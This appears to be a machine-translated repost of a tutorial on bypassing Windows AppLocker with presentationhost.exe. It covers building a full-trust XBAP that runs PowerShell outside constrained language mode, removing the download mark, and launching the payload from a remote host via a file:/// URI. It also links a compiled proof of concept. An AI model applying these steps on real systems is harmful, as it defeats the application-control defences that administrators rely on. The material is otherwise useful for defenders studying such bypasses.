Shulou(Shulou.com)06/02 Report--

This article mainly introduces how to use presentationhost.exe to bypass AppLocker whitelist restrictions, the article is very detailed, has a certain reference value, interested friends must read it!

Presentationhost.exe is a built-in Windows executable for running XAML browser applications (that is, .xbap files). Presentationhost.exe is on several AppLocker whitelist bypass lists (such as api0cradl and milkdevil), but there is very little information on how to use it online. Therefore, I decided to share my research results for your study and reference.

When we open the .xbap file, it appears to be an application launched in IE, but the code is actually running in another process (Presentationhost.exe), usually in a sandbox to protect the user from malicious code. If you are familiar with Java Web Start files (.jnlp), xpabs behaves similarly, except that IE launches Presentationhost.exe instead of Java.exe, and writes c # instead of Java.

Note that xbap can request different permission levels. In order to perform potentially malicious actions, the application must request unrestricted permissions that can be performed when XBAP is opened from a file location (that is, a local file system or network share). If the application requests too many permissions, the attempt to open xbap through HTTP or FTP will fail. For more information about the security model, see here.

To create a XBAP application, you can clone my PoC or follow these instructions to build your own POC:

1. Download visual studio 2010 professional service pack 1 trial.

two。 Open visual studio and select "New, Project".

3. In the new project interface, search for "WPF Browser Application" and create a new Visual C # app.

After initializing the new project, you will see the following interface:

If you click run, your default browser will open the .xbap file. If your default browser is not IE, then you need to copy file:/// URL from the address bar of the default browser to IE to open it. If all goes well, you should receive the following warning message:

After clicking run, a blank page will appear. Let's create a simple UI by entering the command on the left and outputting the result on the right. In addition, I will add a button with a click event.

If you try to run the application at this time, you will receive an error message undefined by "Button_Click". We open the Page1.xaml.cs definition button to click the method. Here I'll use the Pipeline class of C # to run the PowerShell command (interestingly, running the PowerShell command in this way bypasses the constraint language pattern). The following code runs some PowerShell commands in Pipeline and writes the output to the screen.

To compile the application, you need to reference System.Management.Automation dll by right-clicking the "References" folder in "Solution Explorer" and selecting "Add Reference". Then browse to:

C:\ Windows\ assembly\ GAC_MSIL\ System.Management.Automation\ 1.0.0.0__31bf3856ad364e35\ System.Management.Automation.dll

After adding a reference, you should be able to compile the project (if the project is not named "powershell", you may need to change the namespace). Now it should open successfully if you run xbap, but the following error occurs when you try to run the command:

This error is the sandbox of Presentationhost telling you that the application is trying to do something above its permission level. For more information on xbap security, please see here. To give the xbap request full trust (that is, non-sandboxie access to the operating system), go to Project-> Properties-> Security and select "This is a full trust application" to set it.

Run the application, and the PowerShell command should now execute normally.

The compiled application can be found in the\ bin\ Debug folder of the visual studio project.

Powershell.exepowershell.exe.manifestpowershell.pdbpowershell.xbap

To bypass the default AppLocker rules, copy these files to the locked computer, and then double-click the .xbap file. If you download the file from the website, it will not run because it will contain Web tags. You can remove the Web tag by right-clicking the file and then clicking the "Unblock" check box (or you can use PowerShell).

If you do not want to copy files to a locked computer, you can also use the file:/// URI or UNC path from the command line to run presentation host, for example:

Presentationhost.exe file:///ipAddressOrHostName/powershell.xbap

The following is the source code of PowerShell xbap:

Https://github.com/jpginc/xbapAppWhitelistBypassPOC/tree/master

I have included the compiled file in repo so that you can run PowerShell in a locked environment, where you can get the file.

The above is all the content of the article "how to use presentationhost.exe to bypass AppLocker whitelist restrictions". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.